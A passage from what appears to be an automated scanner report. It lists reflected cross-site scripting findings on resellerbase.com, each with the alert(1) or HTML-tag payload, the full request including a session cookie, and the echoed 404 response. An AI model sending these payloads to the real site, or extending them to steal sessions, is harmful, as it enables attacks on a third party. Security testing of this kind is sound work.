<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/search.php?keyword=search...7663a<a>7c4c6b31675&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2275. http://www.resellerbase.com/detail/32/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a5c92<script>alert(1)</script>8ba0e66b454 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32/search.php?keyword=search...&Submit3=Search&opt=2&a5c92<script>alert(1)</script>8ba0e66b454=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/search.php?keyword=search...&Submit3=Search&opt=2&a5c92<script>alert(1)</script>8ba0e66b454=1 was not found on this server.</p>
...[SNIP]...

2.2276. http://www.resellerbase.com/detail/32/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/32/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7c9a6<a>e9d178a148 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/32/search.php?keyword=search...&Submit3=Search&opt=27c9a6<a>e9d178a148 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/search.php?keyword=search...&Submit3=Search&opt=27c9a6<a>e9d178a148 was not found on this server.</p>
...[SNIP]...

2.2277. http://www.resellerbase.com/detail/32/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e5656<script>alert(1)</script>1fff67bc861 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile5656<script>alert(1)</script>1fff67bc861/32/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile5656<script>alert(1)</script>1fff67bc861/32/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2278. http://www.resellerbase.com/detail/32/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 13154<script>alert(1)</script>f61833a17de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3213154<script>alert(1)</script>f61833a17de/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3213154<script>alert(1)</script>f61833a17de/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2279. http://www.resellerbase.com/detail/32/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 58319<script>alert(1)</script>a4b2b80dce2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32/themes58319<script>alert(1)</script>a4b2b80dce2/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/themes58319<script>alert(1)</script>a4b2b80dce2/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2280. http://www.resellerbase.com/detail/32/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1f1c6<script>alert(1)</script>d6edb5b3c84 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32/themes/kosmos1f1c6<script>alert(1)</script>d6edb5b3c84/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/themes/kosmos1f1c6<script>alert(1)</script>d6edb5b3c84/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2281. http://www.resellerbase.com/detail/32/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b22cc<script>alert(1)</script>f7b6f13b216 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32/themes/kosmos/imagesb22cc<script>alert(1)</script>f7b6f13b216/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/themes/kosmos/imagesb22cc<script>alert(1)</script>f7b6f13b216/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2282. http://www.resellerbase.com/detail/32/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 72d98<script>alert(1)</script>3f3c139315b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32/themes/kosmos/images/rating72d98<script>alert(1)</script>3f3c139315b/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/themes/kosmos/images/rating72d98<script>alert(1)</script>3f3c139315b/0.gif was not found on this server.</p>
...[SNIP]...

2.2283. http://www.resellerbase.com/detail/32/themes/kosmos/images/rating/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload f7e02<script>alert(1)</script>c77d4da2da1 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32/themes/kosmos/images/rating/0.giff7e02<script>alert(1)</script>c77d4da2da1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/themes/kosmos/images/rating/0.giff7e02<script>alert(1)</script>c77d4da2da1 was not found on this server.</p>
...[SNIP]...

2.2284. http://www.resellerbase.com/detail/32/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e19ae<script>alert(1)</script>066f539b3b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32/themes/kosmos/images/rating/0.gif?e19ae<script>alert(1)</script>066f539b3b3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/themes/kosmos/images/rating/0.gif?e19ae<script>alert(1)</script>066f539b3b3=1 was not found on this server.</p>
...[SNIP]...

2.2285. http://www.resellerbase.com/detail/33/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bd706<script>alert(1)</script>8b8cf2bf6cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailbd706<script>alert(1)</script>8b8cf2bf6cc/33/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailbd706<script>alert(1)</script>8b8cf2bf6cc/33/ was not found on this server.</p>
...[SNIP]...

2.2286. http://www.resellerbase.com/detail/33/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6fd18<script>alert(1)</script>547a09095c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/336fd18<script>alert(1)</script>547a09095c2/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/336fd18<script>alert(1)</script>547a09095c2/ was not found on this server.</p>
...[SNIP]...

2.2287. http://www.resellerbase.com/detail/33/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b1452<script>alert(1)</script>6f607a8a9f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33/?b1452<script>alert(1)</script>6f607a8a9f1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/?b1452<script>alert(1)</script>6f607a8a9f1=1 was not found on this server.</p>
...[SNIP]...

2.2288. http://www.resellerbase.com/detail/33/love-money-de-german.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/love-money-de-german.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 870be<script>alert(1)</script>32c4819d7ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail870be<script>alert(1)</script>32c4819d7ce/33/love-money-de-german.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail870be<script>alert(1)</script>32c4819d7ce/33/love-money-de-german.html was not found on this server.</p>
...[SNIP]...

2.2289. http://www.resellerbase.com/detail/33/love-money-de-german.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/33/love-money-de-german.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6ff44<a>e80e1aace67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/336ff44<a>e80e1aace67/love-money-de-german.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/336ff44<a>e80e1aace67/love-money-de-german.html was not found on this server.</p>
...[SNIP]...

2.2290. http://www.resellerbase.com/detail/33/love-money-de-german.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/love-money-de-german.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e5341<script>alert(1)</script>dd7378e2a19 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33/e5341<script>alert(1)</script>dd7378e2a19 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/e5341<script>alert(1)</script>dd7378e2a19 was not found on this server.</p>
...[SNIP]...

2.2291. http://www.resellerbase.com/detail/33/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fa967<script>alert(1)</script>ffdcf9c9c59b92fe3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detailfa967<script>alert(1)</script>ffdcf9c9c59b92fe3/33/rating.php?id=33&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailfa967<script>alert(1)</script>ffdcf9c9c59b92fe3/33/rating.php?id=33&rating=5 was not found on this server.</p>
...[SNIP]...

2.2292. http://www.resellerbase.com/detail/33/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2469c<script>alert(1)</script>c39c7baa548 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2469c<script>alert(1)</script>c39c7baa548/33/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2469c<script>alert(1)</script>c39c7baa548/33/rating.php was not found on this server.</p>
...[SNIP]...

2.2293. http://www.resellerbase.com/detail/33/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/33/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3f5c4<script>alert(1)</script>918a21030ec7a894a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/333f5c4<script>alert(1)</script>918a21030ec7a894a/rating.php?id=33&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
